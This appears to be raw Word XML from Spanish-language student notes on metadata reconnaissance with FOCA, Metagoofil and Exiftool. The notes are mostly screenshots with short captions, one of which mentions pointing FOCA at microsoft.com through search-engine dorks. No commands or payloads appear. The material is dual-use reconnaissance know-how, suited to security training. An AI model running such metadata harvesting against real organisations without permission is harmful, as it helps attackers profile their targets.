    <w:p w14:paraId="1F264565" w14:textId="4DBBE3A6" w:rsidR="00332142" w:rsidRPr="00332142" w:rsidRDefault="00332142">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00332142">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FOCA: Analisis de metadatos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55E840" w14:textId="7AB2078A" w:rsidR="00332142" w:rsidRDefault="00B75A6F" w:rsidP="00332142">
      <w:r w:rsidRPr="00B75A6F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD827E1" wp14:editId="23076E9E">
            <wp:extent cx="6264183" cy="2027096"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="21103670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70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314" w14:textId="4C179379" w:rsidR="00B75A6F" w:rsidRDefault="00B75A6F" w:rsidP="00332142">
      <w:r>
        <w:t>Buscar ahí</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63198DDF" w14:textId="56B17B34" w:rsidR="00B75A6F" w:rsidRDefault="008B6F37" w:rsidP="00332142">
      <w:r w:rsidRPr="008B6F37">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71D0700D" wp14:editId="769D56B0">
            <wp:extent cx="5046133" cy="3572475"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="12825436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43651" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación&#10;&#10;El contenido generado por IA puede ser incorrecto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35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C61" w14:textId="25EFC021" w:rsidR="008B6F37" w:rsidRDefault="008B6F37" w:rsidP="00332142">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Añadir fichero en Foca</w:t>
      </w:r>
      <w:r w:rsidR="003360E8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="003360E8" w:rsidRPr="003360E8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Después de eso. Le damos a extraer metadatos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D44C6E4" w14:textId="22783C8E" w:rsidR="003360E8" w:rsidRPr="00332142" w:rsidRDefault="003360E8" w:rsidP="00332142">
      <w:r w:rsidRPr="003360E8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79B7C842" wp14:editId="683284A2">
            <wp:extent cx="4378434" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="6217552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552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80161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3C45" w14:textId="08C45608" w:rsidR="00332142" w:rsidRDefault="00E77986" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E77986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F25340A" wp14:editId="41177F84">
            <wp:extent cx="5842000" cy="4145656"/>
            <wp:effectExtent l="0" t="0" r="6350" b="7620"/>
            <wp:docPr id="4105828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828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43326" cy="41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B29F" w14:textId="77777777" w:rsidR="00605DFC" w:rsidRDefault="00605DFC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F771A28" w14:textId="77777777" w:rsidR="00605DFC" w:rsidRDefault="00605DFC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E207ED" w14:textId="77777777" w:rsidR="00605DFC" w:rsidRDefault="00605DFC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F19E011" w14:textId="77777777" w:rsidR="00605DFC" w:rsidRDefault="00605DFC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4799CC29" w14:textId="77777777" w:rsidR="00605DFC" w:rsidRDefault="00605DFC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACCE836" w14:textId="0FF5F703" w:rsidR="00605DFC" w:rsidRDefault="00605DFC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Para crear un nuevo proyecto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D06F254" w14:textId="2DE15567" w:rsidR="00605DFC" w:rsidRDefault="00605DFC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605DFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38962AC8" wp14:editId="0CF473AB">
            <wp:extent cx="6858000" cy="4623435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="4286140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140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07C2" w14:textId="04C6F67E" w:rsidR="00605DFC" w:rsidRDefault="00605DFC" w:rsidP="00C35F29">
      <w:r>
        <w:t>Le damos a MICROSOFT.COM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE7DA8E" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="165977C5" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="21A98803" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="75DCC222" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="642F1F31" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="08D978C2" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="3343FEB6" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="62DCB2F3" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="2B10EBEE" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="5148DBF5" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="56D94581" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="51991E06" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="7BC1F341" w14:textId="77777777" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29"/>
    <w:p w14:paraId="7C9B871E" w14:textId="07AA5367" w:rsidR="00B30E97" w:rsidRDefault="00B30E97" w:rsidP="00C35F29">
      <w:r w:rsidRPr="00B30E97">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Entonces ahí yo puedo utilizar. A partir de la URL que yo he proporcionado. Para poder. O sea, para que foca pueda. Buscarlo a través de los motores de búsqueda que tú puedes seleccionar, por ejemplo, esta Google Bing Duckduckgo. Y todo eso lo hace por medio de. Google </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dorks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B30E97">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842AEEE" w14:textId="404DBAED" w:rsidR="00B30E97" w:rsidRPr="00605DFC" w:rsidRDefault="00B30E97" w:rsidP="00C35F29">
      <w:r w:rsidRPr="00B30E97">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0108F316" wp14:editId="1A58EC32">
            <wp:extent cx="6858000" cy="4813935"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="19154215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215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7C05" w14:textId="77777777" w:rsidR="00332142" w:rsidRDefault="00332142" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008F2CF7" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525F6A84" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04276CBA" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726A38B7" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00714CC6" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A57FB1" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3385C495" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D20C9C8" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D452898" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652ABA0E" w14:textId="77777777" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38901C3A" w14:textId="016D8828" w:rsidR="007F2DBD" w:rsidRDefault="007F2DBD">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Metagoofil site:github.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF92CE9" w14:textId="7F861D55" w:rsidR="007F2DBD" w:rsidRDefault="00793DB8" w:rsidP="007F2DBD">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793DB8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5720367F" wp14:editId="535E1313">
            <wp:extent cx="6858000" cy="2898775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8713396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9603" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto&#10;&#10;El contenido generado por IA puede ser incorrecto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F6D6" w14:textId="050502F5" w:rsidR="00772183" w:rsidRPr="00772183" w:rsidRDefault="00772183" w:rsidP="007F2DBD">
      <w:r w:rsidRPr="00772183">
        <w:t>Instalar el metagoogil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0B296" w14:textId="036470C3" w:rsidR="007F2DBD" w:rsidRDefault="00772183" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F468E01" wp14:editId="1493145C">
            <wp:extent cx="3779848" cy="1204064"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="205917457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4575" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto&#10;&#10;El contenido generado por IA puede ser incorrecto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1529" w14:textId="2630548F" w:rsidR="002836D9" w:rsidRDefault="002836D9" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002836D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2728AD38" wp14:editId="70CDED15">
            <wp:extent cx="6294665" cy="1996613"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="166898512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5129" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto&#10;&#10;El contenido generado por IA puede ser incorrecto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380" w14:textId="6F67549E" w:rsidR="00223585" w:rsidRDefault="00223585" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Para comprobar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E262EF" w14:textId="7DBCF109" w:rsidR="00223585" w:rsidRDefault="00223585" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223585">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5477F442" wp14:editId="4105D2A1">
            <wp:extent cx="5944115" cy="2377646"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="185031162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11627" name="Imagen 1" descr="Pantalla de computadora con letras&#10;&#10;El contenido generado por IA puede ser incorrecto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867D" w14:textId="588717CC" w:rsidR="004C508A" w:rsidRDefault="004C508A" w:rsidP="00C35F29">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C508A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51A8D82E" wp14:editId="60C0B473">
            <wp:extent cx="6858000" cy="4674870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="398234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34135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414" w14:textId="77777777" w:rsidR="009A192F" w:rsidRDefault="009A192F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F76038" w14:textId="77777777" w:rsidR="009A192F" w:rsidRDefault="009A192F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A766CA5" w14:textId="77777777" w:rsidR="009A192F" w:rsidRDefault="009A192F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E908D3" w14:textId="77777777" w:rsidR="009A192F" w:rsidRDefault="009A192F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EE7AEC" w14:textId="5C74FF62" w:rsidR="009A192F" w:rsidRDefault="009A192F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44EF8D13" w14:textId="77777777" w:rsidR="009A192F" w:rsidRDefault="009A192F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C55D99A" w14:textId="14B09460" w:rsidR="009A192F" w:rsidRDefault="009A192F">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exiftool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F162F97" w14:textId="33E9AB2C" w:rsidR="009A192F" w:rsidRDefault="009A192F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A192F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26587879" wp14:editId="02237705">
            <wp:extent cx="6858000" cy="4413885"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="11392543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54325" name="Imagen 1" descr="Texto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0757" w14:textId="1FDCB4EF" w:rsidR="009A192F" w:rsidRDefault="009A192F" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A192F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7115F3FC" wp14:editId="20E95ECE">
            <wp:extent cx="6858000" cy="3300730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1737512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12219" name="Imagen 1" descr="Texto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26FE" w14:textId="77777777" w:rsidR="004C508A" w:rsidRDefault="004C508A" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3769CA11" w14:textId="77777777" w:rsidR="003114EC" w:rsidRDefault="003114EC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A403B89" w14:textId="77777777" w:rsidR="003114EC" w:rsidRDefault="003114EC" w:rsidP="00C35F29">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A256CE0" w14:textId="1CDDFF99" w:rsidR="003114EC" w:rsidRDefault="003114EC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003114EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BA34E8D" wp14:editId="4E29E58E">
            <wp:extent cx="6858000" cy="3406140"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="209514654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46547" name="Imagen 1" descr="Captura de pantalla de un celular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F4DF" w14:textId="78FEDE9F" w:rsidR="003114EC" w:rsidRDefault="003114EC" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FINALMENTE TENEMOS ESE QUE NO FUNCIONA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAADDF1" w14:textId="77777777" w:rsidR="004C508A" w:rsidRDefault="004C508A" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45ACD2DC" w14:textId="77777777" w:rsidR="004C508A" w:rsidRDefault="004C508A" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4B33A3" w14:textId="77777777" w:rsidR="004C508A" w:rsidRDefault="004C508A" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4209D573" w14:textId="77777777" w:rsidR="004C508A" w:rsidRDefault="004C508A" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FDB4D3" w14:textId="77777777" w:rsidR="004C508A" w:rsidRPr="004C508A" w:rsidRDefault="004C508A" w:rsidP="004C508A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6F2F03" w14:textId="77777777" w:rsidR="004C508A" w:rsidRPr="00EE07C4" w:rsidRDefault="004C508A" w:rsidP="00C35F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004C508A" w:rsidRPr="00EE07C4" w:rsidSect="00200E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91E5" w14:textId="77777777" w:rsidR="00C71233" w:rsidRDefault="00C71233" w:rsidP="00EF54E6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4FE7CE5E" w14:textId="77777777" w:rsidR="00C71233" w:rsidRDefault="00C71233" w:rsidP="00EF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62DA" w14:textId="77777777" w:rsidR="00C71233" w:rsidRDefault="00C71233" w:rsidP="00EF54E6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5E58E322" w14:textId="77777777" w:rsidR="00C71233" w:rsidRDefault="00C71233" w:rsidP="00EF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F8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF4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B00E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="974C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76106"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3A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13A76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBF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96E10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E1A0E6A"/>
    <w:lvl w:ilvl="0" w:tplc="4634B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70B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="689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06D97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34B8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A6DA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C938EB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73BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="165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33FFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E8A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84BCF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19B0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F0B1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="158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80F28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4962BE2C"/>
    <w:lvl w:ilvl="0" w:tplc="4A26EF2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5DB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC5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368B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DC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366BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8321A7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BB151A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FE8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736A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2182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74409"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C694A6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95F9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A44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5CD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="708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45697"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AD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26490"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DD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E23CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F1C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230D77"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DEB434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E3553"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4E48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584D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50F674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B0B80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A13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935373">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="86464470">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2144957251">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1505702331">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="410812185">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1675452339">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1643190596">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="333607961">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1593780968">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1753887353">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="206189852">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1814786748">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="739866768">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1267882296">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="802389080">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1972399347">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1638990364">
